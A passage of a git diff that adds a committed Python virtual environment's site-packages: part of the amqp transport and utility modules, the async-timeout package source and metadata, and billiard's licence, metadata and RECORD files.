+ ca_certs=None, do_handshake_on_connect=False, + suppress_ragged_eofs=True, server_hostname=None, + ciphers=None, ssl_version=None): + """Socket wrap with SNI headers. + + stdlib :attr:`ssl.SSLContext.wrap_socket` method augmented with support + for setting the server_hostname field required for SNI hostname header. + + PARAMETERS: + sock: socket.socket + + Socket to be wrapped. + + keyfile: str + + Path to the private key + + certfile: str + + Path to the certificate + + server_side: bool + + Identifies whether server-side or client-side + behavior is desired from this socket. See + :attr:`~ssl.SSLContext.wrap_socket` for details. + + cert_reqs: ssl.VerifyMode + + When set to other than :attr:`ssl.CERT_NONE`, peers certificate + is checked. Possible values are :attr:`ssl.CERT_NONE`, + :attr:`ssl.CERT_OPTIONAL` and :attr:`ssl.CERT_REQUIRED`. + + ca_certs: str + + Path to “certification authority” (CA) certificates + used to validate other peers’ certificates when ``cert_reqs`` + is other than :attr:`ssl.CERT_NONE`. + + do_handshake_on_connect: bool + + Specifies whether to do the SSL + handshake automatically. See + :attr:`~ssl.SSLContext.wrap_socket` for details. + + suppress_ragged_eofs (bool): + + See :attr:`~ssl.SSLContext.wrap_socket` for details. + + server_hostname: str + + Specifies the hostname of the service which + we are connecting to. See :attr:`~ssl.SSLContext.wrap_socket` + for details. + + ciphers: str + + Available ciphers for sockets created with this + context. See :attr:`ssl.SSLContext.set_ciphers` + + ssl_version: + + Protocol of the SSL Context. The value is one of + ``ssl.PROTOCOL_*`` constants. + """ + opts = { + 'sock': sock, + 'server_side': server_side, + 'do_handshake_on_connect': do_handshake_on_connect, + 'suppress_ragged_eofs': suppress_ragged_eofs, + 'server_hostname': server_hostname, + } + + if ssl_version is None: + ssl_version = ( + ssl.PROTOCOL_TLS_SERVER + if server_side + else ssl.PROTOCOL_TLS_CLIENT + ) + + context = ssl.SSLContext(ssl_version) + + if certfile is not None: + context.load_cert_chain(certfile, keyfile) + if ca_certs is not None: + context.load_verify_locations(ca_certs) + if ciphers is not None: + context.set_ciphers(ciphers) + # Set SNI headers if supported. + # Must set context.check_hostname before setting context.verify_mode + # to avoid setting context.verify_mode=ssl.CERT_NONE while + # context.check_hostname is still True (the default value in context + # if client-side) which results in the following exception: + # ValueError: Cannot set verify_mode to CERT_NONE when check_hostname + # is enabled. + try: + context.check_hostname = ( + ssl.HAS_SNI and server_hostname is not None + ) + except AttributeError: + pass # ask forgiveness not permission + + # See note above re: ordering for context.check_hostname and + # context.verify_mode assignments. + if cert_reqs is not None: + context.verify_mode = cert_reqs + + if ca_certs is None and context.verify_mode != ssl.CERT_NONE: + purpose = ( + ssl.Purpose.CLIENT_AUTH + if server_side + else ssl.Purpose.SERVER_AUTH + ) + context.load_default_certs(purpose) + + sock = context.wrap_socket(**opts) + return sock + + def _shutdown_transport(self): + """Unwrap a SSL socket, so we can call shutdown().""" + if self.sock is not None: + self.sock = self.sock.unwrap() + + def _read(self, n, initial=False, + _errnos=(errno.ENOENT, errno.EAGAIN, errno.EINTR)): + # According to SSL_read(3), it can at most return 16kb of data. + # Thus, we use an internal read buffer like TCPTransport._read + # to get the exact number of bytes wanted. + recv = self._quick_recv + rbuf = self._read_buffer + try: + while len(rbuf) < n: + try: + s = recv(n - len(rbuf)) # see note above + except OSError as exc: + # ssl.sock.read may cause ENOENT if the + # operation couldn't be performed (Issue celery#1414). + if exc.errno in _errnos: + if initial and self.raise_on_initial_eintr: + raise socket.timeout() + continue + raise + if not s: + raise OSError('Server unexpectedly closed connection') + rbuf += s + except: # noqa + self._read_buffer = rbuf + raise + result, self._read_buffer = rbuf[:n], rbuf[n:] + return result + + def _write(self, s): + """Write a string out to the SSL socket fully.""" + write = self.sock.write + while s: + try: + n = write(s) + except ValueError: + # AG: sock._sslobj might become null in the meantime if the + # remote connection has hung up. + # In python 3.4, a ValueError is raised is self._sslobj is + # None. + n = 0 + if not n: + raise OSError('Socket closed') + s = s[n:] + + +class TCPTransport(_AbstractTransport): + """Transport that deals directly with TCP socket. + + All parameters are :class:`~amqp.transport._AbstractTransport` class. + """ + + def _setup_transport(self): + # Setup to _write() directly to the socket, and + # do our own buffered reads. + self._write = self.sock.sendall + self._read_buffer = EMPTY_BUFFER + self._quick_recv = self.sock.recv + + def _read(self, n, initial=False, _errnos=(errno.EAGAIN, errno.EINTR)): + """Read exactly n bytes from the socket.""" + recv = self._quick_recv + rbuf = self._read_buffer + try: + while len(rbuf) < n: + try: + s = recv(n - len(rbuf)) + except OSError as exc: + if exc.errno in _errnos: + if initial and self.raise_on_initial_eintr: + raise socket.timeout() + continue + raise + if not s: + raise OSError('Server unexpectedly closed connection') + rbuf += s + except: # noqa + self._read_buffer = rbuf + raise + + result, self._read_buffer = rbuf[:n], rbuf[n:] + return result + + +def Transport(host, connect_timeout=None, ssl=False, **kwargs): + """Create transport. + + Given a few parameters from the Connection constructor, + select and create a subclass of + :class:`~amqp.transport._AbstractTransport`. + + PARAMETERS: + + host: str + + Broker address in format ``HOSTNAME:PORT``. + + connect_timeout: int + + Timeout of creating new connection. + + ssl: bool|dict + + If set, :class:`~amqp.transport.SSLTransport` is used + and ``ssl`` parameter is passed to it. Otherwise + :class:`~amqp.transport.TCPTransport` is used. + + kwargs: + + additional arguments of :class:`~amqp.transport._AbstractTransport` + class + """ + transport = SSLTransport if ssl else TCPTransport + return transport(host, connect_timeout=connect_timeout, ssl=ssl, **kwargs) diff --git a/env/Lib/site-packages/amqp/utils.py b/env/Lib/site-packages/amqp/utils.py new file mode 100644 index 00000000..8ba5f670 --- /dev/null +++ b/env/Lib/site-packages/amqp/utils.py @@ -0,0 +1,64 @@ +"""Compatibility utilities.""" +import logging +from logging import NullHandler + +# enables celery 3.1.23 to start again +from vine import promise # noqa +from vine.utils import wraps + +try: + import fcntl +except ImportError: # pragma: no cover + fcntl = None # noqa + + +def set_cloexec(fd, cloexec): + """Set flag to close fd after exec.""" + if fcntl is None: + return + try: + FD_CLOEXEC = fcntl.FD_CLOEXEC + except AttributeError: + raise NotImplementedError( + 'close-on-exec flag not supported on this platform', + ) + flags = fcntl.fcntl(fd, fcntl.F_GETFD) + if cloexec: + flags |= FD_CLOEXEC + else: + flags &= ~FD_CLOEXEC + return fcntl.fcntl(fd, fcntl.F_SETFD, flags) + + +def coro(gen): + """Decorator to mark generator as a co-routine.""" + @wraps(gen) + def _boot(*args, **kwargs): + co = gen(*args, **kwargs) + next(co) + return co + + return _boot + + +def str_to_bytes(s): + """Convert str to bytes.""" + if isinstance(s, str): + return s.encode('utf-8', 'surrogatepass') + return s + + +def bytes_to_str(s): + """Convert bytes to str.""" + if isinstance(s, bytes): + return s.decode('utf-8', 'surrogatepass') + return s + + +def get_logger(logger): + """Get logger by name.""" + if isinstance(logger, str): + logger = logging.getLogger(logger) + if not logger.handlers: + logger.addHandler(NullHandler()) + return logger diff --git a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/INSTALLER b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/LICENSE b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/LICENSE new file mode 100644 index 00000000..033c86b7 --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/LICENSE @@ -0,0 +1,13 @@ +Copyright 2016-2020 aio-libs collaboration. + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. diff --git a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/METADATA b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/METADATA new file mode 100644 index 00000000..d8dd6d12 --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/METADATA @@ -0,0 +1,131 @@ +Metadata-Version: 2.1 +Name: async-timeout +Version: 4.0.3 +Summary: Timeout context manager for asyncio programs +Home-page: https://github.com/aio-libs/async-timeout +Author: Andrew Svetlov +Author-email: andrew.svetlov@gmail.com +License: Apache 2 +Project-URL: Chat: Gitter, https://gitter.im/aio-libs/Lobby +Project-URL: CI: GitHub Actions, https://github.com/aio-libs/async-timeout/actions +Project-URL: Coverage: codecov, https://codecov.io/github/aio-libs/async-timeout +Project-URL: GitHub: issues, https://github.com/aio-libs/async-timeout/issues +Project-URL: GitHub: repo, https://github.com/aio-libs/async-timeout +Classifier: Development Status :: 5 - Production/Stable +Classifier: Topic :: Software Development :: Libraries +Classifier: Framework :: AsyncIO +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: Apache Software License +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Requires-Python: >=3.7 +Description-Content-Type: text/x-rst +License-File: LICENSE +Requires-Dist: typing-extensions >=3.6.5 ; python_version < "3.8" + +async-timeout +============= +.. image:: https://travis-ci.com/aio-libs/async-timeout.svg?branch=master + :target: https://travis-ci.com/aio-libs/async-timeout +.. image:: https://codecov.io/gh/aio-libs/async-timeout/branch/master/graph/badge.svg + :target: https://codecov.io/gh/aio-libs/async-timeout +.. image:: https://img.shields.io/pypi/v/async-timeout.svg + :target: https://pypi.python.org/pypi/async-timeout +.. image:: https://badges.gitter.im/Join%20Chat.svg + :target: https://gitter.im/aio-libs/Lobby + :alt: Chat on Gitter + +asyncio-compatible timeout context manager. + + +Usage example +------------- + + +The context manager is useful in cases when you want to apply timeout +logic around block of code or in cases when ``asyncio.wait_for()`` is +not suitable. Also it's much faster than ``asyncio.wait_for()`` +because ``timeout`` doesn't create a new task. + +The ``timeout(delay, *, loop=None)`` call returns a context manager +that cancels a block on *timeout* expiring:: + + from async_timeout import timeout + async with timeout(1.5): + await inner() + +1. If ``inner()`` is executed faster than in ``1.5`` seconds nothing + happens. +2. Otherwise ``inner()`` is cancelled internally by sending + ``asyncio.CancelledError`` into but ``asyncio.TimeoutError`` is + raised outside of context manager scope. + +*timeout* parameter could be ``None`` for skipping timeout functionality. + + +Alternatively, ``timeout_at(when)`` can be used for scheduling +at the absolute time:: + + loop = asyncio.get_event_loop() + now = loop.time() + + async with timeout_at(now + 1.5): + await inner() + + +Please note: it is not POSIX time but a time with +undefined starting base, e.g. the time of the system power on. + + +Context manager has ``.expired`` property for check if timeout happens +exactly in context manager:: + + async with timeout(1.5) as cm: + await inner() + print(cm.expired) + +The property is ``True`` if ``inner()`` execution is cancelled by +timeout context manager. + +If ``inner()`` call explicitly raises ``TimeoutError`` ``cm.expired`` +is ``False``. + +The scheduled deadline time is available as ``.deadline`` property:: + + async with timeout(1.5) as cm: + cm.deadline + +Not finished yet timeout can be rescheduled by ``shift_by()`` +or ``shift_to()`` methods:: + + async with timeout(1.5) as cm: + cm.shift(1) # add another second on waiting + cm.update(loop.time() + 5) # reschedule to now+5 seconds + +Rescheduling is forbidden if the timeout is expired or after exit from ``async with`` +code block. + + +Installation +------------ + +:: + + $ pip install async-timeout + +The library is Python 3 only! + + + +Authors and License +------------------- + +The module is written by Andrew Svetlov. + +It's *Apache 2* licensed and freely available. diff --git a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/RECORD b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/RECORD new file mode 100644 index 00000000..835c41b8 --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/RECORD @@ -0,0 +1,10 @@ +async_timeout-4.0.3.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +async_timeout-4.0.3.dist-info/LICENSE,sha256=4Y17uPUT4sRrtYXJS1hb0wcg3TzLId2weG9y0WZY-Sw,568 +async_timeout-4.0.3.dist-info/METADATA,sha256=WQVcnDIXQ2ntebcm-vYjhNLg_VMeTWw13_ReT-U36J4,4209 +async_timeout-4.0.3.dist-info/RECORD,, +async_timeout-4.0.3.dist-info/WHEEL,sha256=5sUXSg9e4bi7lTLOHcm6QEYwO5TIF1TNbTSVFVjcJcc,92 +async_timeout-4.0.3.dist-info/top_level.txt,sha256=9oM4e7Twq8iD_7_Q3Mz0E6GPIB6vJvRFo-UBwUQtBDU,14 +async_timeout-4.0.3.dist-info/zip-safe,sha256=AbpHGcgLb-kRsJGnwFEktk7uzpZOCcBY74-YBdrKVGs,1 +async_timeout/__init__.py,sha256=A0VOqDGQ3cCPFp0NZJKIbx_VRP1Y2xPtQOZebVIUB88,7242 +async_timeout/__pycache__/__init__.cpython-310.pyc,, +async_timeout/py.typed,sha256=tyozzRT1fziXETDxokmuyt6jhOmtjUbnVNJdZcG7ik0,12 diff --git a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/WHEEL b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/WHEEL new file mode 100644 index 00000000..2c08da08 --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.41.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/top_level.txt b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/top_level.txt new file mode 100644 index 00000000..ad29955e --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/top_level.txt @@ -0,0 +1 @@ +async_timeout diff --git a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/zip-safe b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/zip-safe new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/zip-safe @@ -0,0 +1 @@ + diff --git a/env/Lib/site-packages/async_timeout/__init__.py b/env/Lib/site-packages/async_timeout/__init__.py new file mode 100644 index 00000000..1ffb069f --- /dev/null +++ b/env/Lib/site-packages/async_timeout/__init__.py @@ -0,0 +1,239 @@ +import asyncio +import enum +import sys +import warnings +from types import TracebackType +from typing import Optional, Type + + +if sys.version_info >= (3, 8): + from typing import final +else: + from typing_extensions import final + + +if sys.version_info >= (3, 11): + + def _uncancel_task(task: "asyncio.Task[object]") -> None: + task.uncancel() + +else: + + def _uncancel_task(task: "asyncio.Task[object]") -> None: + pass + + +__version__ = "4.0.3" + + +__all__ = ("timeout", "timeout_at", "Timeout") + + +def timeout(delay: Optional[float]) -> "Timeout": + """timeout context manager. + + Useful in cases when you want to apply timeout logic around block + of code or in cases when asyncio.wait_for is not suitable. For example: + + >>> async with timeout(0.001): + ... async with aiohttp.get('https://github.com') as r: + ... await r.text() + + + delay - value in seconds or None to disable timeout logic + """ + loop = asyncio.get_running_loop() + if delay is not None: + deadline = loop.time() + delay # type: Optional[float] + else: + deadline = None + return Timeout(deadline, loop) + + +def timeout_at(deadline: Optional[float]) -> "Timeout": + """Schedule the timeout at absolute time. + + deadline argument points on the time in the same clock system + as loop.time(). + + Please note: it is not POSIX time but a time with + undefined starting base, e.g. the time of the system power on. + + >>> async with timeout_at(loop.time() + 10): + ... async with aiohttp.get('https://github.com') as r: + ... await r.text() + + + """ + loop = asyncio.get_running_loop() + return Timeout(deadline, loop) + + +class _State(enum.Enum): + INIT = "INIT" + ENTER = "ENTER" + TIMEOUT = "TIMEOUT" + EXIT = "EXIT" + + +@final +class Timeout: + # Internal class, please don't instantiate it directly + # Use timeout() and timeout_at() public factories instead. + # + # Implementation note: `async with timeout()` is preferred + # over `with timeout()`. + # While technically the Timeout class implementation + # doesn't need to be async at all, + # the `async with` statement explicitly points that + # the context manager should be used from async function context. + # + # This design allows to avoid many silly misusages. + # + # TimeoutError is raised immediately when scheduled + # if the deadline is passed. + # The purpose is to time out as soon as possible + # without waiting for the next await expression. + + __slots__ = ("_deadline", "_loop", "_state", "_timeout_handler", "_task") + + def __init__( + self, deadline: Optional[float], loop: asyncio.AbstractEventLoop + ) -> None: + self._loop = loop + self._state = _State.INIT + + self._task: Optional["asyncio.Task[object]"] = None + self._timeout_handler = None # type: Optional[asyncio.Handle] + if deadline is None: + self._deadline = None # type: Optional[float] + else: + self.update(deadline) + + def __enter__(self) -> "Timeout": + warnings.warn( + "with timeout() is deprecated, use async with timeout() instead", + DeprecationWarning, + stacklevel=2, + ) + self._do_enter() + return self + + def __exit__( + self, + exc_type: Optional[Type[BaseException]], + exc_val: Optional[BaseException], + exc_tb: Optional[TracebackType], + ) -> Optional[bool]: + self._do_exit(exc_type) + return None + + async def __aenter__(self) -> "Timeout": + self._do_enter() + return self + + async def __aexit__( + self, + exc_type: Optional[Type[BaseException]], + exc_val: Optional[BaseException], + exc_tb: Optional[TracebackType], + ) -> Optional[bool]: + self._do_exit(exc_type) + return None + + @property + def expired(self) -> bool: + """Is timeout expired during execution?""" + return self._state == _State.TIMEOUT + + @property + def deadline(self) -> Optional[float]: + return self._deadline + + def reject(self) -> None: + """Reject scheduled timeout if any.""" + # cancel is maybe better name but + # task.cancel() raises CancelledError in asyncio world. + if self._state not in (_State.INIT, _State.ENTER): + raise RuntimeError(f"invalid state {self._state.value}") + self._reject() + + def _reject(self) -> None: + self._task = None + if self._timeout_handler is not None: + self._timeout_handler.cancel() + self._timeout_handler = None + + def shift(self, delay: float) -> None: + """Advance timeout on delay seconds. + + The delay can be negative. + + Raise RuntimeError if shift is called when deadline is not scheduled + """ + deadline = self._deadline + if deadline is None: + raise RuntimeError("cannot shift timeout if deadline is not scheduled") + self.update(deadline + delay) + + def update(self, deadline: float) -> None: + """Set deadline to absolute value. + + deadline argument points on the time in the same clock system + as loop.time(). + + If new deadline is in the past the timeout is raised immediately. + + Please note: it is not POSIX time but a time with + undefined starting base, e.g. the time of the system power on. + """ + if self._state == _State.EXIT: + raise RuntimeError("cannot reschedule after exit from context manager") + if self._state == _State.TIMEOUT: + raise RuntimeError("cannot reschedule expired timeout") + if self._timeout_handler is not None: + self._timeout_handler.cancel() + self._deadline = deadline + if self._state != _State.INIT: + self._reschedule() + + def _reschedule(self) -> None: + assert self._state == _State.ENTER + deadline = self._deadline + if deadline is None: + return + + now = self._loop.time() + if self._timeout_handler is not None: + self._timeout_handler.cancel() + + self._task = asyncio.current_task() + if deadline <= now: + self._timeout_handler = self._loop.call_soon(self._on_timeout) + else: + self._timeout_handler = self._loop.call_at(deadline, self._on_timeout) + + def _do_enter(self) -> None: + if self._state != _State.INIT: + raise RuntimeError(f"invalid state {self._state.value}") + self._state = _State.ENTER + self._reschedule() + + def _do_exit(self, exc_type: Optional[Type[BaseException]]) -> None: + if exc_type is asyncio.CancelledError and self._state == _State.TIMEOUT: + assert self._task is not None + _uncancel_task(self._task) + self._timeout_handler = None + self._task = None + raise asyncio.TimeoutError + # timeout has not expired + self._state = _State.EXIT + self._reject() + return None + + def _on_timeout(self) -> None: + assert self._task is not None + self._task.cancel() + self._state = _State.TIMEOUT + # drop the reference early + self._timeout_handler = None diff --git a/env/Lib/site-packages/async_timeout/py.typed b/env/Lib/site-packages/async_timeout/py.typed new file mode 100644 index 00000000..3b94f915 --- /dev/null +++ b/env/Lib/site-packages/async_timeout/py.typed @@ -0,0 +1 @@ +Placeholder diff --git a/env/Lib/site-packages/billiard-4.1.0.dist-info/INSTALLER b/env/Lib/site-packages/billiard-4.1.0.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/billiard-4.1.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/billiard-4.1.0.dist-info/LICENSE.txt b/env/Lib/site-packages/billiard-4.1.0.dist-info/LICENSE.txt new file mode 100644 index 00000000..b9920edb --- /dev/null +++ b/env/Lib/site-packages/billiard-4.1.0.dist-info/LICENSE.txt @@ -0,0 +1,29 @@ +Copyright (c) 2006-2008, R Oudkerk and Contributors + +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions +are met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. +3. Neither the name of author nor the names of any contributors may be + used to endorse or promote products derived from this software + without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS +OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT +LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY +OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF +SUCH DAMAGE. + diff --git a/env/Lib/site-packages/billiard-4.1.0.dist-info/METADATA b/env/Lib/site-packages/billiard-4.1.0.dist-info/METADATA new file mode 100644 index 00000000..abf1404c --- /dev/null +++ b/env/Lib/site-packages/billiard-4.1.0.dist-info/METADATA @@ -0,0 +1,111 @@ +Metadata-Version: 2.1 +Name: billiard +Version: 4.1.0 +Summary: Python multiprocessing fork with improvements and bugfixes +Home-page: https://github.com/celery/billiard +Author: R Oudkerk / Python Software Foundation +Author-email: python-dev@python.org +Maintainer: Asif Saif Uddin +Maintainer-email: auvipy@gmail.com +License: BSD +Keywords: multiprocessing pool process +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: Programming Language :: Python +Classifier: Programming Language :: C +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Operating System :: Microsoft :: Windows +Classifier: Operating System :: POSIX +Classifier: License :: OSI Approved :: BSD License +Classifier: Topic :: Software Development :: Libraries :: Python Modules +Classifier: Topic :: System :: Distributed Computing +Requires-Python: >=3.7 +License-File: LICENSE.txt + +======== +billiard +======== +:version: 4.1.0 + +|build-status-lin| |build-status-win| |license| |wheel| |pyversion| |pyimp| + +.. |build-status-lin| image:: https://secure.travis-ci.org/celery/billiard.png?branch=master + :alt: Build status on Linux + :target: https://travis-ci.org/celery/billiard + +.. |build-status-win| image:: https://ci.appveyor.com/api/projects/status/github/celery/billiard?png=true&branch=master + :alt: Build status on Windows + :target: https://ci.appveyor.com/project/ask/billiard + +.. |license| image:: https://img.shields.io/pypi/l/billiard.svg + :alt: BSD License + :target: https://opensource.org/licenses/BSD-3-Clause + +.. |wheel| image:: https://img.shields.io/pypi/wheel/billiard.svg + :alt: Billiard can be installed via wheel + :target: https://pypi.org/project/billiard/ + +.. |pyversion| image:: https://img.shields.io/pypi/pyversions/billiard.svg + :alt: Supported Python versions. + :target: https://pypi.org/project/billiard/ + +.. |pyimp| image:: https://img.shields.io/pypi/implementation/billiard.svg + :alt: Support Python implementations. + :target: https://pypi.org/project/billiard/ + +About +----- + +``billiard`` is a fork of the Python 2.7 `multiprocessing `_ +package. The multiprocessing package itself is a renamed and updated version of +R Oudkerk's `pyprocessing `_ package. +This standalone variant draws its fixes/improvements from python-trunk and provides +additional bug fixes and improvements. + +- This package would not be possible if not for the contributions of not only + the current maintainers but all of the contributors to the original pyprocessing + package listed `here `_. + +- Also, it is a fork of the multiprocessing backport package by Christian Heims. + +- It includes the no-execv patch contributed by R. Oudkerk. + +- And the Pool improvements previously located in `Celery`_. + +- Billiard is used in and is a dependency for `Celery`_ and is maintained by the + Celery team. + +.. _`Celery`: http://celeryproject.org + +Documentation +------------- + +The documentation for ``billiard`` is available on `Read the Docs `_. + +Bug reporting +------------- + +Please report bugs related to multiprocessing at the +`Python bug tracker `_. Issues related to billiard +should be reported at https://github.com/celery/billiard/issues. + +billiard is part of the Tidelift Subscription +--------------------------------------------- + +The maintainers of ``billiard`` and thousands of other packages are working +with Tidelift to deliver commercial support and maintenance for the open source +dependencies you use to build your applications. Save time, reduce risk, and +improve code health, while paying the maintainers of the exact dependencies you +use. `Learn more`_. + +.. _`Learn more`: https://tidelift.com/subscription/pkg/pypi-billiard?utm_source=pypi-billiard&utm_medium=referral&utm_campaign=readme&utm_term=repo + + diff --git a/env/Lib/site-packages/billiard-4.1.0.dist-info/RECORD b/env/Lib/site-packages/billiard-4.1.0.dist-info/RECORD new file mode 100644 index 00000000..7047ba65 --- /dev/null +++ b/env/Lib/site-packages/billiard-4.1.0.dist-info/RECORD @@ -0,0 +1,62 @@ +billiard-4.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +billiard-4.1.0.dist-info/LICENSE.txt,sha256=ZjLlmsq9u77CYoN9RHJKBlMYlJ8ALv0GAtZCcRrjpFc,1483 +billiard-4.1.0.dist-info/METADATA,sha256=aolwNxOX7RY_L8e-95BUhGMoZRpEIs8hFauy_jbuBos,4389 +billiard-4.1.0.dist-info/RECORD,, +billiard-4.1.0.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +billiard-4.1.0.dist-info/top_level.txt,sha256=52Kkdlqn9Np8pbpkTVd_1KZTZLGjupUzhUw8QsW-B-U,9 +billiard/__init__.py,sha256=gW4fsfgAwncLwNe2MIB-y1nLWnswFPlJQ8mhvfrrpuI,1556 +billiard/__pycache__/__init__.cpython-310.pyc,, +billiard/__pycache__/_ext.cpython-310.pyc,, +billiard/__pycache__/_win.cpython-310.pyc,, +billiard/__pycache__/common.cpython-310.pyc,, +billiard/__pycache__/compat.cpython-310.pyc,, +billiard/__pycache__/connection.cpython-310.pyc,, +billiard/__pycache__/context.cpython-310.pyc,, +billiard/__pycache__/einfo.cpython-310.pyc,, +billiard/__pycache__/exceptions.cpython-310.pyc,, +billiard/__pycache__/forkserver.cpython-310.pyc,, +billiard/__pycache__/heap.cpython-310.pyc,, +billiard/__pycache__/managers.cpython-310.pyc,, +billiard/__pycache__/pool.cpython-310.pyc,, +billiard/__pycache__/popen_fork.cpython-310.pyc,, +billiard/__pycache__/popen_forkserver.cpython-310.pyc,, +billiard/__pycache__/popen_spawn_posix.cpython-310.pyc,, +billiard/__pycache__/popen_spawn_win32.cpython-310.pyc,, +billiard/__pycache__/process.cpython-310.pyc,, +billiard/__pycache__/queues.cpython-310.pyc,, +billiard/__pycache__/reduction.cpython-310.pyc,, +billiard/__pycache__/resource_sharer.cpython-310.pyc,, +billiard/__pycache__/semaphore_tracker.cpython-310.pyc,, +billiard/__pycache__/sharedctypes.cpython-310.pyc,, +billiard/__pycache__/spawn.cpython-310.pyc,, +billiard/__pycache__/synchronize.cpython-310.pyc,, +billiard/__pycache__/util.cpython-310.pyc,, +billiard/_ext.py,sha256=ybsKrDCncAVFL8ml4nMNKbvb2no5sap3qHc6_cwUxqE,872 +billiard/_win.py,sha256=vILzfaBKGhhNjePPfRTdRrVoIygnXyUGtJ4FmBFU4Gw,2919 +billiard/common.py,sha256=zwZfEFio46uJPyyT5sf7Fy8HLLkJdf_WW2CKMo7gpeI,4154 +billiard/compat.py,sha256=Q30pRcJmFdwHDNuJJsB8xmXJfuv_RGT8zuY0PHGB9L0,8148 +billiard/connection.py,sha256=DdrB0iAM0zZtjKmr51hv9t4YjsWHafZ5FCbOKs8mkIw,32647 +billiard/context.py,sha256=QfLpnJwJblvUP_BPRDrbBx9DgKBvH5ZHDDkYr2anw1E,13154 +billiard/dummy/__init__.py,sha256=MGuxw6dYyU-TokOw2mEizwefj-FxjDwq5tEshuSJ5ng,4633 +billiard/dummy/__pycache__/__init__.cpython-310.pyc,, +billiard/dummy/__pycache__/connection.cpython-310.pyc,, +billiard/dummy/connection.py,sha256=UYjJH4smDsj7X0W4uJxvg97z2TxILDL2x5GER4vv4Mw,2907 +billiard/einfo.py,sha256=SJYr7icbwPZe2B0Lq54BQv1AQXJr7ipk6BQCPanavUo,4381 +billiard/exceptions.py,sha256=xymsevvXvB5SO-ebmaHBqQPEJfl6EqThM1PlLtGFk3U,1272 +billiard/forkserver.py,sha256=SPfs8T2uaPtfK_F1ADVNNPZGSUrjeadTf5h6gwKOiPc,8282 +billiard/heap.py,sha256=OV-9fVpdgYC1HJV_gdTOSpKZvPqd1A12s1Rl9CNfLQA,9278 +billiard/managers.py,sha256=yxeuqrtauo173KJy6SuK3EAfRmSWejBqEi-oJ57ZokI,36757 +billiard/pool.py,sha256=P_j1jdXuvWyw4BSjuC5bLVQtQKDG7S40bzLHWZ4ZkWo,68786 